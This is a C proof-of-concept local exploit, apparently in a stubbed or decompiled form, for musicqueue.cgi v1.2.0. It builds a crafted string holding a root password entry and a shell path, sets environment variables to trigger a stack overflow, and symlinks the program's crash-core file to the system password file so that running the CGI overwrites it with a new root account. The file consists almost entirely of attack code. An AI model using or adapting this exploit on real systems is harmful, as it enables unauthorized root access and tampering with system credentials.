
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int ttl_str_bf ;
typedef int atk_str ;
typedef int FILE ;


 int CRASH_CORE_PATH ;
 int DEF_LEN ;
 int DEF_MN ;
 int DEF_NR ;
 int DEF_TG_PATH ;
 int DEF_ZR ;
 int REQUEST_METHOD_MK ;
 int ROOT_PWD ;
 int SHELL_PATH ;
 char* STK_OVERFLOW_STR ;
 int SZ_DEF_BR ;
 int S_ENV_PTE ;
 int S_ENV_PTH ;
 int S_ENV_PTO ;
 int S_PASS ;
 int S_TOKEN ;
 char* TTL_FORMAT_STR ;
 int USER_GID ;
 int USER_UID ;
 int WRT_PASSWD_PATH ;
 int execl (int ,int ,int *) ;
 int fclose (int *) ;
 int * fopen (int ,char*) ;
 int fprintf (int ,char*) ;
 scalar_t__ fread (int*,int ,int ,int *) ;
 int memset (char*,int,int) ;
 int setenv (int ,char*,int) ;
 int snprintf (char*,int,char*,int ,int ,int ,int ,int ,int ,int ,int ,int ,int ,int ,int ) ;
 int stdout ;
 int strlen (char*) ;
 int symlink (int ,int ) ;
 int unlink (int ) ;

int main(void)
{
 FILE *fp=(((void*)0));
 char atk_str[(SZ_DEF_BR)],ttl_str_bf[(DEF_LEN)];
 int r=(DEF_ZR),r_r=(DEF_ZR);

 fprintf(stdout,"\n 0x82-Local.musicqueue_xpl - musicqueue.cgi v-1.2.0 POC exploit.\n\n");

 memset((char *)atk_str,(DEF_ZR),sizeof(atk_str));
 snprintf(atk_str,sizeof(atk_str)-1,(TTL_FORMAT_STR),
  (REQUEST_METHOD_MK),(S_TOKEN),(S_PASS),(S_TOKEN),
  (USER_UID),(S_TOKEN),(USER_GID),(S_TOKEN),(S_TOKEN),
  (ROOT_PWD),(S_TOKEN),(SHELL_PATH));

 if((fp=fopen((WRT_PASSWD_PATH),"r"))==((void*)0))
  return((DEF_MN));

 memset((char *)ttl_str_bf,(DEF_ZR),sizeof(ttl_str_bf));
 for(r_r=(DEF_ZR);r_r<strlen(atk_str);r_r++)
  ttl_str_bf[r_r]=atk_str[r_r];

 while(fread(&r,(DEF_NR),(DEF_NR),fp))
  ttl_str_bf[r_r++]=(r);

 fclose(fp);
 ttl_str_bf[strlen(ttl_str_bf)-1]='\0';


 setenv((S_ENV_PTE),(ttl_str_bf),strlen(ttl_str_bf));

 setenv((S_ENV_PTO),(STK_OVERFLOW_STR),strlen(STK_OVERFLOW_STR));







 unlink(CRASH_CORE_PATH);
 symlink((WRT_PASSWD_PATH),(CRASH_CORE_PATH));


 execl((DEF_TG_PATH),(DEF_TG_PATH),(((void*)0)));
}
